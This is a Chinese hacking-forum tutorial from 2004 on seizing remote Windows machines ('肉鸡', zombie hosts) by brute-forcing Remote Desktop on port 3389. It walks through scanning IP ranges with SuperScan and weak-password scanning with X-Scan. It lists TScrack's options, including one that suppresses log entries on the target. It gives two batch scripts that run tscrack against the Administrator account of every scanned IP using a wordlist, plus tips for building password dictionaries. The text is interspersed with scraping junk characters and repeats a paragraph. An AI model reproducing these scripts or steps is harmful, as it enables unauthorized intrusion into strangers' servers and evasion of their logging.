|
作者:霜风 QQ:14226581
* B( a$ P5 k, T2 _; z) w; L1 }终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。+ ] Q% ?, D: ` E: g9 T, [3 \
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: - T; \1 I [6 Z9 `* B2 G
首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:2 C3 C' D4 b& {/ o
先打开superscan3如图15 v- F! Z' Y9 B
d5 O+ K0 F* z( ]+ W( i此主题相关图片如下:1 @( g( B2 R- e' n
& e" |8 Y) b% f+ h- b1 H' [
# h/ L- [4 X% [0 l: H2 X接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2; V) M' w4 N, z6 }) G4 l9 q
- M6 X4 w' }6 {" Z% s8 l此主题相关图片如下:
0 Z4 X* Z V9 x3 q- T: u1 I) ~' Q5 L5 F; v( J
5 r- w1 M, X. V; n" X% L6 y
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.
9 d* C4 @0 z" _$ v这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图30 x% y2 }: W: b9 W- @
" `& j. f/ f# u) W$ T4 W$ A/ ]
此主题相关图片如下:6 ?3 j8 ]- B7 Q5 L6 k ]7 P
3 \, r: e! u" y6 E2 L9 J
$ H1 k& K* e) b ^- K“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。
4 S1 g# S C) u* n% G: Y
) m* s* W# b# S, H) J此主题相关图片如下:
9 T* r- D) U1 e; n8 a
& L! {- d, \: m6 G& j接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5( ?5 G0 J- i% X' y8 e- a
; Q! s4 m: l0 }" x. X
此主题相关图片如下:
6 z G# P# r! l% U3 M i- G. X3 ~, n* D) T# r
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。 [6 C" }" J \. i
所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
+ s5 o K% U9 C7 FTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
% h! `2 ^ S0 U' o& i1 |此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。
' P2 N7 s2 \& `( l+ e. Z9 V在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:2 r& w- T4 Y4 s' }2 q4 [8 N4 p/ g
-h : Print usage help and exit
9 c; p# d* V* Y& H% z" d1 u-V : Print version info and exit
3 N% d0 p5 }8 t! t$ T-s : Print chipher strenght info and exit
5 ?6 ~$ `5 x0 x/ U5 G3 k-b : Enable failed password beep0 ~) K/ B8 v1 ^. G; ~* e
-t : Use two simultaneous connections [EXPERIMENTAL]1 `% x1 P: t. h# M! `: b
-N : Prevent System Log entries on targeted server+ x+ M8 ~1 j$ u4 O9 c `
-U : Uninstall tscrack and remove components- y9 ~, Y( ^! O8 ~; x2 P4 D- G
-f <number> : Wordlist entry to start cracking with
/ \4 @. ]' @1 X/ ~0 i-F <delay> : Sampling Frequency (Delay between samples in ms)% J6 y" L2 [" l/ |
-l <user> : Account name to use, defaults to Administrator
4 w0 p) u, Z+ l' a-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted7 c" F0 [# b# d; G; }
-p <password> : Use <password> to logon instead of wordlist/blank pass$ {" E0 O( {" c$ P9 o
-D <domain> : Specify domain to attempt logon to % m+ k$ B: E) u0 |$ v
& F4 q$ y$ e( f l" R: ?% I6 X8 V2 ~$ K U& m
我就帮忙翻译一下吧,翻译得不好可不要怪我啊:
9 x3 N% R! n5 F. e- k-h : 显示使用帮助然后退出0 e$ Y; y8 ]9 Z( s& k2 `
-V : 显示版本信息然后退出 y3 q9 L/ H3 d7 I9 I; C
-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)
: \* `$ r, x6 d" A3 T-b : 密码错误时发出声音
! N- j4 T/ b8 V/ v-t : 同时发出多个连接,就是多线程。( _+ j" ], h: k. ~1 ?6 e4 h
-N : Prevent System Log entries on targeted server6 b {$ ]+ |7 c1 \3 U
-U : 卸载移除tscrack组件。
- Q5 ^& {9 T5 Z-f <number> : 使用-F后面的密码。. f! l* S, o3 J s
-F <delay> : 间隔时间(频率). _# M# J. W2 A, B
-l <user> : 使用-L后面的用户名" N( R7 X2 S0 D
-w <wordlist> : 使用-W后面的字典
4 r# z0 ?+ F% n8 f2 a# _8 h: K-p <password> : 使用-W后的密码
5 C% l" F4 A+ N-D <domain> : 登陆主页面?& c. v z, p4 `- \
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:
3 v+ J( w/ }6 A% V" R0 I h@if not exist IpcScan.txt goto noscan
j( N4 ^; P6 @+ d$ w@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
; K: M* c3 Y$ @$ w/ S- d:noscan T5 z6 ^7 v3 x6 P0 U% ~3 D/ o6 T
@echo 3389.txt no find or scan faild 
% V( W! j& d$ X5 O这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)3 m& C# C: y) r
保存后把后错名改为BAT就可以了。
* z- w. c0 H1 ~. T还写一个BAT,名字为HACK.BAT,代码如下:
8 `2 W1 v. r" \: K' J@if not exist tscrack.exe goto noscan
. e# u" t+ b! B5 J@tscrack %1 -l administartor -w pass.dic >>rouji.txt T1 X6 q) c' ?( i, N
:noscan
6 U3 }. e! x: r@echo tscrack.exe no find or scan faild ) J) c- q. ?- n% `& }2 \2 O) Z
这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC( c( l5 x9 G6 a
制作方法如上。9 X* O0 K0 n$ ^
然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图65 ]+ o a8 x9 i7 }' J! L
/ g9 L/ ]* p+ m$ D/ u此主题相关图片如下:
: l& f5 W6 u: o3 ~怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
3 K( [! Q& g. Q) B# [1 `" X最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图77 }4 Y% v* W- q( u. Q: l6 t
- R8 Q, S% \$ T' P" k1 S" c
此主题相关图片如下:
% t& n% R; `7 q7 [! I5 p" A
! R3 _# W* ^5 X6 g6 ]# Y& D& Q- e怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
+ v! ]/ E' S$ H; E2 }最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
